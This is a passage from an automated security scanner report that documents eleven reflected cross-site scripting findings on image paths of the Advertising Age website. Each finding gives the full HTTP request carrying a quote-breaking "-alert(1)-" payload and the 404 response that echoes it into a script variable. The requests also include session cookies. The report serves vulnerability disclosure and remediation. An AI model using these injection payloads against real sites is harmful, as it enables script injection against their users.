<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images23e81"-alert(1)-"624d2126b2f/save-and-share-icons/icon-stumbleupon.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none
...[SNIP]...

1.38. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f1c"-alert(1)-"52bc10e1626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons70f1c"-alert(1)-"52bc10e1626/icon-stumbleupon.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E2A225669D2F29C00884475EB93848458FB9EF8B; path=/
Set-Cookie: HMAC=F98E0BDCB0F72D70CD67C8B8CE6D47B0C6E8F00D; path=/
Set-Cookie: HMAC=94077089744211A45BDE1AE2164DE7A7323CFD49; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons70f1c"-alert(1)-"52bc10e1626/icon-stumbleupon.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.39. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-stumbleupon.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceff"-alert(1)-"43132adc9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-stumbleupon.pngbceff"-alert(1)-"43132adc9ae?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=594BF58730F7B8396E727A075A61399E7156ED14; path=/
Set-Cookie: HMAC=9EACCB83F273F595F3F5D485BDA2D753F19DA42B; path=/
Set-Cookie: HMAC=AD8CA8B1255F6AE252554E4479C41323EDA8E15C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-stumbleupon.pngbceff"-alert(1)-"43132adc9ae"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.40. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6724"-alert(1)-"3898a6cbc75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //imagesc6724"-alert(1)-"3898a6cbc75/save-and-share-icons/icon-twitter.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BE6BDC036641CF37D22A00031EEB10C66BDA5372; path=/
Set-Cookie: HMAC=90D4611C5D43286CE82E6E9D3B403D8D9FB259A1; path=/
Set-Cookie: HMAC=5D98CE82537224CFA1E0DDAE383B11DCB07158AC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//imagesc6724"-alert(1)-"3898a6cbc75/save-and-share-icons/icon-twitter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
h
...[SNIP]...

1.41. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd3e"-alert(1)-"787499129a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons9dd3e"-alert(1)-"787499129a0/icon-twitter.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DE481D219602428CB86582296BBF91DE1B59666F; path=/
Set-Cookie: HMAC=25C5C0AA974C7A12CF62373DF7B434F5927A5F21; path=/
Set-Cookie: HMAC=9E9C856F8FADD5E4542522D4C9B613FDEF821CCC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons9dd3e"-alert(1)-"787499129a0/icon-twitter.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.42. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-twitter.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b30"-alert(1)-"9953fe8144b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-twitter.png25b30"-alert(1)-"9953fe8144b?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E2D3BE55BB99E37EBC462E412B60F8D224A880DB; path=/
Set-Cookie: HMAC=6AF7FCFBE9C27F9D0898656444984BA64F00CCFD; path=/
Set-Cookie: HMAC=35CF4A07B56BD7724BE8DF5E4D322D486F0F8208; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49481
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744534";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-twitter.png25b30"-alert(1)-"9953fe8144b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.43. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5717a"-alert(1)-"218f6484cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images5717a"-alert(1)-"218f6484cfb/save-and-share-icons/icon-windows-live.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3571C49AD493663EDCD59969AFB4EE1269945125; path=/
Set-Cookie: HMAC=B2B1908A2F0107885D0186DF26638E23A8B54C5C; path=/
Set-Cookie: HMAC=D9B323C1FA6BD20B8F2761906BC82531F9B25514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images5717a"-alert(1)-"218f6484cfb/save-and-share-icons/icon-windows-live.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.44. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d3c"-alert(1)-"8b3b1df80a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons70d3c"-alert(1)-"8b3b1df80a2/icon-windows-live.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=1FAC74C2E630C70CB84086317BE912578FC2DEA6; path=/
Set-Cookie: HMAC=3E89AB9A509E7F907AE3EA6559D541A3AC9F6D0A; path=/
Set-Cookie: HMAC=28C3285E3FBD9B9B6D2DD7EC6B62459EF11C937A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons70d3c"-alert(1)-"8b3b1df80a2/icon-windows-live.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.45. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-windows-live.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22f2"-alert(1)-"e9197d2134d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-windows-live.pngd22f2"-alert(1)-"e9197d2134d?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=24E5A2D36E3724EFFD0F6D9626C5B9854905EC02; path=/
Set-Cookie: HMAC=983E1084E5656B5CC28592D0DBC65B9ED2D13E38; path=/
Set-Cookie: HMAC=7D6FF0020A157C95BAC35D846E3BE65667B9A4FB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49486
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...


//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/icon-windows-live.pngd22f2"-alert(1)-"e9197d2134d"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.46. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dea1"-alert(1)-"006abeca062 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images9dea1"-alert(1)-"006abeca062/save-and-share-icons/icon-yahoo.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D01DBB7E21A4C054740848B34F2EFD583D4F4A29; path=/
Set-Cookie: HMAC=37940D28AD9CF13B2826DAA4700BA8363D19E30C; path=/
Set-Cookie: HMAC=07846E9EF77BE9A14BDBE2FBF3D746481A7BE416; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images9dea1"-alert(1)-"006abeca062/save-and-share-icons/icon-yahoo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx
...[SNIP]...

1.47. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb300"-alert(1)-"409ac85f166 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-iconsbb300"-alert(1)-"409ac85f166/icon-yahoo.png?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=46D2ED7049869FE81AB5B21DDD5E87B977167929; path=/
Set-Cookie: HMAC=764A894DE96C847ADE320F6FD3EC1E09931AB6D6; path=/
Set-Cookie: HMAC=A60C29673AEA9BF9468BD13CFDAA79DE99C64DCE; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744535";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-iconsbb300"-alert(1)-"409ac85f166/icon-yahoo.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.48. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-yahoo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7777"-alert(1)-"a13f0a5b58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/icon-yahoo.pngb7777"-alert(1)-"a13f0a5b58b?1291744535 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
